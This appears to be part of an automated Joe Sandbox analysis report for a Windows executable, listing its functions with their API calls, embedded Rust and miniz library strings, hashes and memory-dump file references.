Opcode Fuzzy Hash: 016300fd1fcdfac6d9336933cb7c6600dba760ac4fdae651b4ed9979cd9d6665
Instruction Fuzzy Hash: 30E1A362E08BD989EB708FA5DA403F82361FF44798F448135DF5D9B795EF38A6859300

Function 00007FF63D2AB9B0 Relevance: 13.1, APIs: 5, Strings: 3, Instructions: 1128COMMON

Download Yara Rule

Strings

a formatting trait implementation returned an error when the underlying stream did notlibrary\alloc\src\fmt.rs, xrefs: 00007FF63D2ABAF5
capacity overflow, xrefs: 00007FF63D2AC9B7
called `Result::unwrap()` on an `Err` valueErrorLayoutError, xrefs: 00007FF63D2ABBAF

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: a formatting trait implementation returned an error when the underlying stream did notlibrary\alloc\src\fmt.rs$called `Result::unwrap()` on an `Err` valueErrorLayoutError$capacity overflow
API String ID: 0-1329486492
Opcode ID: 6c4d2e56daff0ecd167304263bbc487717256c1edb8efd0f07cef1487183eecf
Instruction ID: d1ccc4065b72050b253fb7d2c240bb0d8e2ef8413d5c345a1942613fc1c02c67
Opcode Fuzzy Hash: 6c4d2e56daff0ecd167304263bbc487717256c1edb8efd0f07cef1487183eecf
Instruction Fuzzy Hash: F3A24A66F18BE985F7018BB899022BC6760FF5A7D4F444335EF5897B86EF389601A340

Function 00007FF63D2B2030 Relevance: 11.7, Strings: 9, Instructions: 442COMMON

Download Yara Rule

Strings

assertion failed: d.mant.checked_add(d.plus).is_some(), xrefs: 00007FF63D2B10DC, 00007FF63D2B2833
+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 00007FF63D2B2033, 00007FF63D2B28C1
assertion failed: d.minus > 0, xrefs: 00007FF63D2B10AC, 00007FF63D2B2803
assertion failed: edelta >= 0library\core\src\num\diy_float.rs, xrefs: 00007FF63D2B2893
assertion failed: d.mant > 0, xrefs: 00007FF63D2B1094, 00007FF63D2B27EB
assertion failed: d.mant + d.plus < (1 << 61), xrefs: 00007FF63D2B287B
assertion failed: d.mant.checked_sub(d.minus).is_some(), xrefs: 00007FF63D2B10F4, 00007FF63D2B284B
assertion failed: d.plus > 0, xrefs: 00007FF63D2B10C4, 00007FF63D2B281B
assertion failed: buf.len() >= MAX_SIG_DIGITS, xrefs: 00007FF63D2B110C, 00007FF63D2B2863

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs
API String ID: 0-3544694999
Opcode ID: 4b3ec176b76211cd2a10c7cdccc78feed1dd0a790ac80f4a690f6e5a2fb89574
Instruction ID: d9ac53b7bdc9c6839f15646fca40145c22764f7da38ceaee0028f5c8e9db9c92
Opcode Fuzzy Hash: 4b3ec176b76211cd2a10c7cdccc78feed1dd0a790ac80f4a690f6e5a2fb89574
Instruction Fuzzy Hash: A9F123A2B04B9986EB14CFA4A9413E86761FF447C8F404036DF0D97B98EF78DA46D380

Function 00007FF63D281A40 Relevance: 10.9, APIs: 7, Instructions: 370COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D281CFA
GetFullPathNameW.KERNEL32 ref: 00007FF63D281D0F
GetLastError.KERNEL32 ref: 00007FF63D281D1A
GetLastError.KERNEL32 ref: 00007FF63D281D33

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$FullNamePath
String ID:
API String ID: 2482867836-0
Opcode ID: 10edb34490b38a551cd0b2d9d6e45ced2d63e1d8984cb6416219109b2a70296a
Instruction ID: e932e92f8ce3121969659df86a079e69a089fd2fcff2bf020e4a714cbe55647b
Opcode Fuzzy Hash: 10edb34490b38a551cd0b2d9d6e45ced2d63e1d8984cb6416219109b2a70296a
Instruction Fuzzy Hash: D4E1AF62F0878A45FB669BA1DA443B96265BF04BD8F048035DF1C977D5EF3CE688A300

Function 00007FF63D2D7330 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 425COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF63D2D77A9

Strings

d->m_pOutput_buf < d->m_pOutput_buf_end, xrefs: 00007FF63D2D77A2
/, xrefs: 00007FF63D2D74BC
miniz.c, xrefs: 00007FF63D2D73A9, 00007FF63D2D779B
!d->m_output_flush_remaining, xrefs: 00007FF63D2D73B0

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: _assert
String ID: !d->m_output_flush_remaining$/$d->m_pOutput_buf < d->m_pOutput_buf_end$miniz.c
API String ID: 1222420520-939395013
Opcode ID: a487f9df0897c6ae8324075d8e35fc5177824fb5c02a170f67c9abbfe35eaa34
Instruction ID: 043d97ccd4c6a5e14651fd60803264c1057aeca762f1d8317eb1251720d6e2f5
Opcode Fuzzy Hash: a487f9df0897c6ae8324075d8e35fc5177824fb5c02a170f67c9abbfe35eaa34
Instruction Fuzzy Hash: 9E122B72A04A4A8BE758CF69C54066C3BA1FF54B48F548136CF1A83788EF3DE845D740

Function 00007FF63D29C120 Relevance: 8.3, Strings: 6, Instructions: 813COMMON

Download Yara Rule

Strings

zero, xrefs: 00007FF63D29CCC1
fs11, xrefs: 00007FF63D29CCD1
fs10, xrefs: 00007FF63D29CCC9
21tf, xrefs: 00007FF63D29CCE7
11tf, xrefs: 00007FF63D29CCEF
ft10, xrefs: 00007FF63D29CCD9

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: 11tf$21tf$fs10$fs11$ft10$zero
API String ID: 0-3297899624
Opcode ID: e6a83365bf47f4fa6ebce8182dbc1526a6300701e12ed640505a6a71e3e5322c
Instruction ID: e0c81ff721d4fa6fc5f2db3a9040a7f7bde90c14592fa29daf091a3f8b59ea79
Opcode Fuzzy Hash: e6a83365bf47f4fa6ebce8182dbc1526a6300701e12ed640505a6a71e3e5322c
Instruction Fuzzy Hash: 3D52C55271C0B642F3355B79E211A3E6E93C74AF49E9DA031D78C09ED4EA3F16A1F620

Function 00007FF63D25D520 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 360COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D25D5A5
memcpy.MSVCRT ref: 00007FF63D25D639
memset.MSVCRT ref: 00007FF63D25EBED

Part of subcall function 00007FF63D280EF0: GetStdHandle.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF63D280F1F
Part of subcall function 00007FF63D280EF0: GetLastError.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF63D280F2F

Strings

assertion failed: filled <= self.buf.init, xrefs: 00007FF63D25D678, 00007FF63D25EC6E

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memset$ErrorHandleLastmemcpy
String ID: assertion failed: filled <= self.buf.init
API String ID: 4037564346-906094691
Opcode ID: 393289d34c21c9435a835fe3c0108e54edf3a0261968d23094b9af20abc9f286
Instruction ID: a4010a1dbb1a867326433c1d3d9ee18ec2c26538b0247c7d737575fd988df244
Opcode Fuzzy Hash: 393289d34c21c9435a835fe3c0108e54edf3a0261968d23094b9af20abc9f286
Instruction Fuzzy Hash: 48C1F862F04B5946EF24CBA2EA006B9A7A2FB45BC4F544436DF0E97745EE3CE492D300

Function 00007FF63D2D7FA0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 429COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF63D2D849C

Strings

bits <= ((1U << len) - 1U), xrefs: 00007FF63D2D8495
code < TDEFL_MAX_HUFF_SYMBOLS_2, xrefs: 00007FF63D2D84E4
miniz.c, xrefs: 00007FF63D2D848E, 00007FF63D2D84DD

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: _assert
String ID: bits <= ((1U << len) - 1U)$code < TDEFL_MAX_HUFF_SYMBOLS_2$miniz.c
API String ID: 1222420520-2298030977
Opcode ID: c075d9dd20240d24c3aa77f113a6d644868bbeba7f4ba79e2041725402f427c6
Instruction ID: 3e6848d082fa9c4fa51bdc4b34f484a8960f072369cc4826f1507fde92979003
Opcode Fuzzy Hash: c075d9dd20240d24c3aa77f113a6d644868bbeba7f4ba79e2041725402f427c6
Instruction Fuzzy Hash: 4702D332A0C29987E7298E68C5406BDB7A1FF94B08F548135CF9A83798EF7DD805D740

Function 00007FF63D26DA50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63D26DA2F), ref: 00007FF63D26DA7D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63D26DA2F), ref: 00007FF63D26DC10

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D26DC2D
overflow when subtracting durations, xrefs: 00007FF63D26DBF8

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorFrequencyLastPerformanceQuery
String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
API String ID: 3362413890-1633623230
Opcode ID: e110d0550d4be53cca64662aa36c9b3c1f6baef898b34e672dcbe532d5d85635
Instruction ID: 07f32c14a0817d8dab1436e2b6e9c8ea00a94c03fceb09fcf408dd9a59cd22a0
Opcode Fuzzy Hash: e110d0550d4be53cca64662aa36c9b3c1f6baef898b34e672dcbe532d5d85635
Instruction Fuzzy Hash: B961F522F187AE45FB15DBB5DA007BD6361AF44790F448032DE0E97B99EEBCA941A340

Function 00007FF63D2AF840 Relevance: 5.4, Strings: 4, Instructions: 356COMMON

Download Yara Rule

Strings

FFFFFFFF, xrefs: 00007FF63D2AF994
cannot parse float from empty stringinvalid float literalassertion failed: edelta >= 0library\core\src\num\diy_float.rs, xrefs: 00007FF63D2AFD32
d, xrefs: 00007FF63D2AF9F5
FFFFFFFF, xrefs: 00007FF63D2AF876

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: FFFFFFFF$FFFFFFFF$cannot parse float from empty stringinvalid float literalassertion failed: edelta >= 0library\core\src\num\diy_float.rs$d
API String ID: 0-1258069422
Opcode ID: b919c37030ce28c58c3e421755fbc5dbe9e22fe64c590991e85f27ef456516ef
Instruction ID: c59c9e07360f529c6091a7ef0e854fc26275fde80f53058adf3f3ab785eb39dc
Opcode Fuzzy Hash: b919c37030ce28c58c3e421755fbc5dbe9e22fe64c590991e85f27ef456516ef
Instruction Fuzzy Hash: 07C19C62F0869985EA50CFA686107F86B90EF55BE4F494232EF6E833C1FE3D9545E300

Function 00007FF63D2A9920 Relevance: 5.3, Strings: 4, Instructions: 306COMMON

Download Yara Rule

Strings

Authenti, xrefs: 00007FF63D2A9CB8
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D2A9925
GenuineI, xrefs: 00007FF63D2A9D0A
HygonGen, xrefs: 00007FF63D2A9CD7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$Authenti$GenuineI$HygonGen
API String ID: 0-1540695585
Opcode ID: 497cf9bde67d657714d30a6a9e4ea4508630fa734bc516074808672686d99aab
Instruction ID: fa5ee679e2a2eecd8e1991730395217501e54339252c39a9e5a8f19a60378395
Opcode Fuzzy Hash: 497cf9bde67d657714d30a6a9e4ea4508630fa734bc516074808672686d99aab
Instruction Fuzzy Hash: EA916BA3B2595506FB5C85A6AD32BB90892B3587C8F48A03DEE5FD7BC5DD7CC9118200

Function 00007FF63D22EDB4 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 596COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D22EF0E
memset.MSVCRT ref: 00007FF63D22EF23

Strings

assertion failed: code < MAX_HUFF_SYMBOLS_2, xrefs: 00007FF63D22F768

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memset
String ID: assertion failed: code < MAX_HUFF_SYMBOLS_2
API String ID: 2221118986-707042715
Opcode ID: a38dcf0db5251079c23e625c0f0856a6bfee7fb2089e4bc8dcb93148aa4ec43e
Instruction ID: f1a40f27421c04c0bfd13788793d59b4d9256986a23dc6a2eef7e5d3bfc68f25
Opcode Fuzzy Hash: a38dcf0db5251079c23e625c0f0856a6bfee7fb2089e4bc8dcb93148aa4ec43e
Instruction Fuzzy Hash: C9420422A1CA8A41F6A0DB92E5003FA6761FB85788F444132FF8D87BD6EE7CD545E740

Function 00007FF63D2995B6 Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

wCGR, xrefs: 00007FF63D2995E5
wCGR, xrefs: 00007FF63D29963D
wCGR, xrefs: 00007FF63D299611
wCGR, xrefs: 00007FF63D2995B6

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: wCGR$wCGR$wCGR$wCGR
API String ID: 0-1544543998
Opcode ID: b76849e2c63d6d30d82bc14477643e3235ad5eb05f076e6cf90bd5cefba32814
Instruction ID: 1862849ef38d1e7cf2e2895b76ab5ec75aac9c7652e15ca64a9f733cb3fbf86e
Opcode Fuzzy Hash: b76849e2c63d6d30d82bc14477643e3235ad5eb05f076e6cf90bd5cefba32814
Instruction Fuzzy Hash: 2721FC93F0C09946E761C57B514067D5EE2DB4AB94B28F031C389867D4ED3BA913FB50

Function 00007FF63D2BA0E0 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 340COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D2BA5BC
memset.MSVCRT ref: 00007FF63D2BA60D

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FF63D2BA235, 00007FF63D2BA352, 00007FF63D2BA38C, 00007FF63D2BA3D1, 00007FF63D2BA415, 00007FF63D2BA439

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memset
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
API String ID: 2221118986-3825506207
Opcode ID: 2ee8c62daf8919137ebe3993411475a7d742ad96e406f9c8ee6e6c9c5bbcabfd
Instruction ID: 3f23d11e3a51ef3b6b8f869ef6e36b174e4d5597fd9d2f3366b5aa97f9c3bdff
Opcode Fuzzy Hash: 2ee8c62daf8919137ebe3993411475a7d742ad96e406f9c8ee6e6c9c5bbcabfd
Instruction Fuzzy Hash: 73C18B5270866945DB089F7AA9012796E65FB88BE4F409232EF2EC7BE4FD7CD944C310

Function 00007FF63D29D887 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 281COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF63D29DBCE
memcmp.MSVCRT ref: 00007FF63D29DBE8

Strings

fcwfswxmm16xmm17xmm18xmm19xmm20xmm21xmm22xmm23xmm24xmm25xmm26xmm27xmm28xmm29xmm30xmm31k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17, xrefs: 00007FF63D29DBC1

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcmp
String ID: fcwfswxmm16xmm17xmm18xmm19xmm20xmm21xmm22xmm23xmm24xmm25xmm26xmm27xmm28xmm29xmm30xmm31k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17
API String ID: 1475443563-1161499575
Opcode ID: c263884aa9e3057750cdec65988fce9bccec6885e3903c3fde1f5f5258ffec36
Instruction ID: 8642fe54175aba2104cdf5cbb54988b0cfeca7893aac0c69a4691824d2515692
Opcode Fuzzy Hash: c263884aa9e3057750cdec65988fce9bccec6885e3903c3fde1f5f5258ffec36
Instruction Fuzzy Hash: 54A1D54591C0FA40E3242F71915067A3AA2DB1EF49B5A5433DBC98ABC4ED7FE562F230

Function 00007FF63D2D15DD Relevance: 4.7, Strings: 2, Instructions: 2158COMMON

Download Yara Rule

Strings

2, xrefs: 00007FF63D2D29FD
2, xrefs: 00007FF63D2D32BF

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

